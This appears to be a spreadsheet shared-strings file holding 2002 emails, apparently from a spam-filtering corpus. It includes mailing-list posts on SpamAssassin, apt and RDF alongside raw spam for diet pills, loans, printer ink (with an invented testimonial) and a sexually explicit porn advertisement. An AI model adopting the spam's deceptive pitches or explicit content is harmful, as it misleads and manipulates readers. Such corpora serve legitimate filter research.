             &lt;/table&gt;&lt;/DIV&gt;
         &lt;/form&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;/P&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Re: [SAdev] Scoring Yahoo Ads
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 23, 2002 at 03:43:24PM -0400, rODbegbie wrote:
 &gt; &gt; It's quite clear that most of this list does not consider
 &gt; &gt; all advertisement to be spam, particularly when attached to a valid
 &gt; &gt; personal email by a third-party service.
 &gt; 
 &gt; Cool.  So we're all in agreement then.  Except for Marc.
 So what brilliant metric do you have in mind to measure unsolicited vs.
 solicited commercial email?
 I know I've registered for many commercial lists that send material that
 really reads like spam.  Moreover, spammers will be able to circumvent
 SA if they make spam look like this SCE.  This kind of convergence of the
 two.... well, it stinks.  We can kill SCE, or we can cripple
 identification of UCE.
 Obviously an interim solution is to whitelist, but long term is probably
 harder.  What kind of SCE, like MSDN newsletters, product updates, etc
 is in the corpus for the GA?  Maybe seeding the corpus with a bigger set
 of these type of mails will have some interesting/useful results.
 Ross Vandegrift
 ross@willow.seitz.com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</si>
  <si>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Re: Using hosts file to rid yourself of popup ads
</t>
  </si>
  <si>
    <t xml:space="preserve">Obviously you need a server at 127.0.0.1 that serves well known cookies...
 The arms race continues.
 sdw
 Udhay Shankar N wrote:
 &gt; At 09:24 PM 8/3/02 -0700, Mr. FoRK wrote:
 &gt;
 &gt;&gt; Don't know if everybody knows this trick...
 &gt;&gt;
 &gt;&gt; Puts 127.0.0.1 as the IP for adservers. Elegant.
 &gt;
 &gt;
 &gt; You should note that this trick has been out-evolved by [some] 
 &gt; websites. These sites (e.g, yahoo) require a cookie that is set by the 
 &gt; pop-up ad to be present before your browsing can continue...
 &gt;
 &gt; Udhay
 &gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: About apt, kernel updates and dist-upgrade
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Feb 04, 2002 at 05:04:08PM +0200, Peter Peltonen wrote:
 &gt; I started wondering how does apt react when it finds a newer kernel in the 
 &gt; bunch of "to be updated" files?
 Look at /etc/apt/apt.conf. I think ^kernel$ matches the kernel packages
 (apart from those matched by the rest, smp, enterprise).
 I think it won't do anything about the kernels. Come to think of it, the
 abovementioned might have nothing to do with it.
 I explicitly use apt-get install kernel and then from the list pick a
 version and then install kernel#2.4.foo-bar.
 &gt; And has anyone ever tried to do a dist-upgrade, say from 7.1 to 7.2? 
 &gt; Should it work? If not, why?
 Should. Haven't tried with dist-upgrade but I have put 7.2 netboot
 mirror (ie, 7.2) into sources.list and run install step-by-step for IIRC
 everything. Worked ok. I think there'll be a few .rpmnew files worth
 checking such as, especially, passwd and group.
 I think there was a group change. "lock" ?
 -- 
 It feels great to wake up and not know what day it is, doesn't it?
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Forged whitelist spam
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; You mean like on mac keyboards :-)
 Or any of the Microsoft USB keyboards.  I've an MS Internet Pro unit with two
 ports off it's hub.
 I've considered using the 64mb flash unit in one of them as storage for keys.
 Unfortunately the KVM switching would drive the client programs crazy when
 switching between the machines.
 -Bill Kearney
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Apt problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Two issues:
 --&lt;snip&gt;--
 Sorry, but the following packages have unmet dependencies:
   openssh: Depends: openssl (= 0.9.5a) but 0.9.6b-8 is installed
   php-pgsql: Depends: postgresql but it is not installed
              Depends: libpq.so.2
 E: Unmet dependencies. Try using -f.
 --&lt;/snip&gt;--
 1. I have the following openssl packages installed:
 --&lt;snip&gt;--
 openssl-perl-0.9.6b-8
 openssl-0.9.6b-8
 openssl095a-0.9.5a-11
 openssl-devel-0.9.6b-8
 --&lt;/snip&gt;--
 The openssl095a package should provide the openssl-0.9.5a compatibility 
 but apt doesn't think so? 
 2. I have postgresql installed from the source. So that's why I need 
 php-pgsql. Is there a way to tell apt about packages I don't want it to 
 complain about?
 -- 
 Peter
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Feeling fat?
</t>
  </si>
  <si>
    <t xml:space="preserve">If anyone has called you names because you're overweight,
 or you are looking to make a positive change in your life,
 then you can do something now!
 Click here to find out how
 http://4xenical.com/loseweight.cfm
 _______________________________________________
 We hope you enjoyed receiving this email, but if you no longer
 wish to receive our emails click on the link below and you will
 not hear from us again  - we guarantee it!
 http://4xenical.com/remove.cfm
 mvuyrbjoefexbxbqnxqafujbgnn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RDF redux
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#rdf_redux
 Date: 2002-10-02T09:42:39-05:00
 I think I'm going to become one of _those_ people. You know, one of those 
 people who has a &amp;#8220;Semantic Web&amp;#8221; category on their weblog. This will 
 be a Geek Purity Test question someday. Onward: 
 - _Phil Ringnalda_: Fun with RDF[1]. &amp;#8220;RDF can actually be fun, as long as 
 you don't foolishly invest too much ego in trying to store RSS 1.0, or wander 
 off into flame wars.&amp;#8221; From which we find: 
 - _Shelley Powers_: The RDF Query-O-Matic[2], and The RDF Query-O-Matic 
 explained[3]. &amp;#8220;The Query-o-Matic accepts the name of an RDF file (any 
 valid RDF file), and an RDFQL (RDF Query Language) query, and will print out a 
 test value found as a result of that query.&amp;#8221; 
 - _Marcus Campbell_: &amp;#8220;My FOAF autocreation script is moving along nicely
 [4]. It's now looping through my OPML blogroll file, checking the first load of 
 bites in people's pages for head linked FOAF files, grabbing certain elements 
 from these files (if they have one) and spitting them out into a brand new FOAF 
 file for me.&amp;#8221; 
 - _Joe Gregorio_: The Well-Formed Web[5]. &amp;#8220;After spending some time 
 badgering poor Bill Kearney for a concrete benefit of having RDF in RSS 1.0 and 
 not getting a really satisfactory answer I went back and read Paul Ford's essay 
 again. I wanted to get that old religious feeling back again. It didn't work. 
 The magic was gone.&amp;#8221; 
 [1] http://philringnalda.com/archives/002336.php
 [2] http://weblob.burningbird.net/services/query.htm
 [3] http://weblog.burningbird.net/archives/000564.php
 [4] http://www.ninjakitten.net/digiboy/2002_09.php#post000545
 [5] http://bitworking.org/wellformed.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Notice
</t>
  </si>
  <si>
    <t xml:space="preserve">
 We are Loan Specialists.....Tap into our huge network of Lenders!
 For U.S.A. Homeowners Only
 Interest Rates have Dropped....Start Saving Now!
 We Will Shop The Best Loan For You!
 Are you in debt? Need extra cash? We can get you the loan you need. Regardless 
 of whether you have good or bad credit, we can help you.We specialize in First 
 and Second Mortgages, including loans that other lenders turn down. Funding 
 borrowers with less than perfect credit is our specialty. We have loan programs 
 that are unheard of.
 CLICK HERE FOR ALL DETAILS http://membres.tripod.fr/zapote24/
 ===================================================================
 REMOVAL INSTRUCTIONS: You may automatically remove yourself from any future mailings
 by clicking here. mailto:geoposti@uole.com?subject=delete-mort
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Got Ink?              21846
</t>
  </si>
  <si>
    <t xml:space="preserve">What have you been up to?
 I don't know about you, but I am sick and tired of going
 down to the store to find out that your printer cartridges
 cost more than the printer itself! I know how you feel
 - I print over 500 pages a day, and it feels like there is
 a vacuum sucking money out of my wallet! Now, this has got
 to stop because I know it doesn't cost the printer companies
 anywhere near what it costs me to do my office and school work!
 Well, it finally has.  The SUPERINK solution.
 You're probably thinking to yourself, "Gosh darn, not another
 cheap knockoff printer cartridge!" Like you, I was very 
 skeptical at first, but my best friend &amp; business associate
 said it helped her save over $100 a month on printer supplies. 
 So I tried it. I mean, there was nothing to lose because they
 offer a 100% satisfaction guarantee, up to a one-year warranty
 on all of their products and FREE Shipping on ALL orders!
 Let me tell you, it was one of the best decisions I've ever made.
 Period. Six months later, as I'm writing this message to you,
 I've gone from spending $1000 dollars a month on printer supplies
 to Now ONLY $475! and I haven't had to sacrifice the quality or
 service that I received from the local office supply store. In fact,
 the service is even BETTER!  I've had 1 defective cartridge since 
 I started dealing with SUPERINK and they sent me a new replacement
 within 3 days, no questions asked. Now, I can print all I want!
 I was so happy with the results that I contacted their manufacturer
 and got permission to be a reseller - at a BIG discount. I want
 to help other people to avoid getting jipped by the printer companies
 like I did. Because a penny saved is a penny earned! 
 I give you my personal pledge the SUPERINK soltuion will absolutely
 WORK FOR YOU. If it doesn't, you can return your order anytime
 for a full refund.  
 If you are frustrated with dishing out money like it is water to the
 printer companies, or tired of poor quality ink &amp; toner cartridges,
 then I recommend - the SUPERINK solution.
 You're probably asking yourself, "Ok, so how do we save all this money
 without losing quality and service?"
 Modern technology has provided SUPERINK with unique, revolutionary
 methods of wax molding that allow the ink &amp; toner to 'settle', which
 prevents any substantial damage that would occur during shipping and
 handling. Nothing "magic" about it - just quality &amp; savings, BIG SAVINGS!
 Here is the bottom line ...
 I can help you save 30%-70% per week/per month/per year or per lifetime 
 by purchasing any of our ink &amp; toner supplies. Just try it once, you'll 
 keep coming back - there's nothing to lose, and much MONEY to be saved! 
 100% Satisfaction Guaranteed. You will be able to print as much as you
 want without wasting money or sacrificing quality - GUARANTEED.
 That is my pledge to you. 
 To order from the SUPERINK Solution on our secure server, just click
 on the link below (or enter it into your browser):
 http://www.superink.net/
 If you have difficulty accessing the website above, please
 try contacting us toll-free at 1-800-758-8084 - Thanks!
 Sincerely - Bruce Tipton
 ******************************************************************
 If you do not wish to receive any more emails from me, please 
 send an email to "print2@btamail.net.cn" requesting to be removed.
 Thank You and Sorry for any inconvenience.
 ******************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">**Scraping**:  I've read this before, but it's worth pointing to: Jon
 Udell on &lt;a href=http://www.byte.com/documents/s=493/byt20010214s0005/index.htm&gt;SSL
 Proxying&lt;/a&gt;.
  the browser's secure traffic flows to Proxomitron. It decrypts that
  traffic, so you can see it in the log window, and then re-encrypts it to
  the destination server. Coming back the other way, it decrypts the
  server's responses, so you can see them in the log window, then
  re-encrypts them to complete the secure loop back to the browser.  It's
  really quite amazing, and amazingly useful. Automation tasks that used to
  look like more trouble than they were worth -- for example, driving a
  HotMail or E*Trade account from a script -- suddenly look easy.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free big cock in Pussy
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=(0050)http://www.wannawatch.com/orgysex/fc01.cgi?tappers --&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;!!!Freak Cock!!!&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 6.00.2716.2200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=605 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://www.jeweldive.com:81/sle/freak/spacer.gif" width=127&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://www.jeweldive.com:81/sle/freak/spacer.gif" width=106&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://www.jeweldive.com:81/sle/freak/spacer.gif" width=169&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://www.jeweldive.com:81/sle/freak/spacer.gif" width=51&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://www.jeweldive.com:81/sle/freak/spacer.gif" width=127&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://www.jeweldive.com:81/sle/freak/spacer.gif" width=25&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=99 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_01.gif"
       width=233 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=99 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_02.gif"
       width=220 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG height=99
       src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_03.jpg" width=127
       border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG height=99
       src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_04.gif" width=25
       border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG height=59
       src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_05.jpg" width=127
       border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=3&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=59 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_06.gif"
       width=326 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=59 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_07.jpg"
       width=152 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG height=115
       src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_08.jpg" width=127
       border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=115 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_09.gif"
       width=275 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=3&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=115 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_10.jpg"
       width=203 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=35 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_11.jpg"
       width=233 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG height=35
       src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_12.gif" width=169
       border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=3&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=35 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_13.jpg"
       width=203 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=98 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_14.jpg"
       width=233 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=98 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_15.jpg"
       width=220 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=98 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_16.jpg"
       width=152 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=6&gt;&lt;A href="http://www.jeweldive.com:81/sle/freak/index.html"&gt;&lt;IMG
       height=37 src="http://www.jeweldive.com:81/sle/freak/freak_cock_fpa_clean_17.gif"
       width=605 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
   &lt;p align="left"&gt;&lt;a href="http://www.jeweldive.com:81/removal/"&gt;Click Here&lt;/a&gt; 
     to be Removed&lt;/p&gt;
 &lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Olympus Brio D-100 1.3 MegaPixel Digital Camera: Starting Bid $99
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Auctions Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee" alink=#0000FF vlink=#0000FF&gt;
 &lt;center&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;&lt;td width=442 colspan=4&gt;&lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPMW6xk43enOIRzw0LGkkRR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/hd.gif" width=442 height=60
 alt="Auctions Weekly Newsletter" border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;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&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 &lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- bottom right column --&gt;        
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get
 action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font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value="http://auctions.cnet.com/cgi-bin/search/search?ss=%%q%%&amp;loc=auc"&gt;
 Auctions
  &lt;option
 value="http://cnet.search.com/search?tag=ex.auctions.dispatch.srch.cnet"
 &gt;All CNET
  &lt;option
 value="http://www.search.com/search?tag=ex.auctions.dispatch.srch.web"&gt;T
 he Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit
 value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 &lt;table width=160 bgcolor="#ffffef" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=5 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=6&gt;&lt;img src="http://www.cnet.com/b.gif" width=6 height=1&gt;&lt;/td&gt;
 &lt;td width=149&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;img
 src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13z6ShlJ1kOqFb2GVaGdR" &gt;Site
 Map&lt;/a&gt;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jxOqfFjlwvurMPGPxZ6RcR" &gt;Desktops&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cTyIcD6_xDblRuaBDxRURR" &gt;Notebooks&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzwpG7wISmwzk0xBfd-8WFR" &gt;Components&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idnjk7pEm0ceVXCHnpqL0w4R" &gt;Software&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJjcI4ckPrqm86ccJ_2d2eR" &gt;Input Devices&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeW6ZSlYvuqzceCGFySNP8yR" &gt;Networking&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIPiqGNtxJb9IO3JewkhBpPR" &gt;Handhelds&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKmP0G5eEr1yZeU_u_KnuR" &gt;Printers&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1CMD2LcWLXZBXqONOVsR" &gt;Memory&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQwRxLGDi5w8PF_jEuwtZR" &gt;Storage&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0EHeeqr06f_4Mc3148lk6dR" &gt;Electronics&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVIg93JP10TRnU3P83P5XcR" &gt;Monitors&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgsVMyGUFkeE4rbg6amtIRR" &gt;Modems&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XPQSRbFFUssDLfzpHOCeFR" &gt;Scanners&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRdag3SP2FiEL2t1VlTK8y9R" &gt;Services&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbza6XC0GSZvwlGWUTnaNtuR" &gt;Digital Cameras&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJ9IR3PBMsMWz8AtIQwjjsR" &gt;Accessories&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEkRnakOAcWhKPAKa1CPIPR" &gt;Multimedia&lt;/a&gt;&lt;br&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;img src="http://www.cnet.com/b.gif" width=149 height=10&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;img src="http://www.cnet.com/b.gif" width=3 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /bottom right column --&gt;
 &lt;P&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
 src="http://www.cnet.com/i/nl/dd_c.gif" width=9&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60 src="http://www.cnet.com/b.gif" width=1&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=430 bgColor=#ffffff&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 bgColor=#EEEEEE border=0 bordercolor="#EEEEEE"&gt;
 &lt;TBODY&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="3" align=bottom&gt;
 &lt;font face="arial, helvetica" size="-2" color="#000000"&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;July 18th, 2002&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;IMG height=8 src="http://www.cnet.com/b.gif" width=1&gt;
 &lt;div align="center"&gt;
 &lt;table border="1" cellspacing="1" bordercolor="#FFCC00" width="100%" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td&gt;&lt;div align="center"&gt;&lt;table border="0" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2"&gt;&lt;br&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;u&gt;&lt;font face="Arial" color="#0000FF" size="3"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLWMEoDXIFUywq2NRJSBTeR" &gt;
 Olympus Brio D-100 1.3 MegaPixel Digital Camera&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;
 &lt;font face="Arial" size="2" color="#0000FF"&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="65%" valign="top" align="left"&gt;
 &lt;br&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;1.3 MegaPixel Resolution&lt;/b&gt;&lt;/li&gt;
